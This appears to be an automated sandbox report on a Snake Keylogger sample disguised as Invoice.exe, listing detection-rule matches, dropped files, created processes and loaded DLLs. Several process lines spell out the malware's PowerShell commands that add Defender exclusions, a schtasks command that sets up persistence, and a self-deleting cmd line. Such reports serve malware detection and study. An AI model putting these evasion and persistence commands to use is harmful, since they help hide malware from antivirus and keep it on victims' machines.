Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice.exe.3bb1570.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1497789349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1344246907.0000000003B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7396, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, .cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Invoice.exe.3bb1570.2.raw.unpack, .cs	Base64 encoded string: 'm/ttYj6Gp+oR72Co9K9RCqyxOftqW2VR3vrkbv/cJcFfgAxJkA2S7f0OwzV6eRLx'
Source: 0.2.Invoice.exe.3b90b50.1.raw.unpack, .cs	Base64 encoded string: 'm/ttYj6Gp+oR72Co9K9RCqyxOftqW2VR3vrkbv/cJcFfgAxJkA2S7f0OwzV6eRLx'

Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, so214WIr6LYMrBtinr.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, so214WIr6LYMrBtinr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, so214WIr6LYMrBtinr.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, so214WIr6LYMrBtinr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@23/25@2/2

Source: C:\Users\user\Desktop\Invoice.exe

File created: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Users\user\Desktop\Invoice.exe	Mutant created: \Sessions\1\BaseNamedObjects\edhAywijYll
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7028
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588

Source: C:\Users\user\Desktop\Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE22E.tmp

Jump to behavior

Source: Invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Invoice.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Invoice.exe	Virustotal: Detection: 49%
Source: Invoice.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Invoice.exe

File read: C:\Users\user\Desktop\Invoice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice.exe "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7028 -s 1808
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: ucrtbase_clr0400.dll
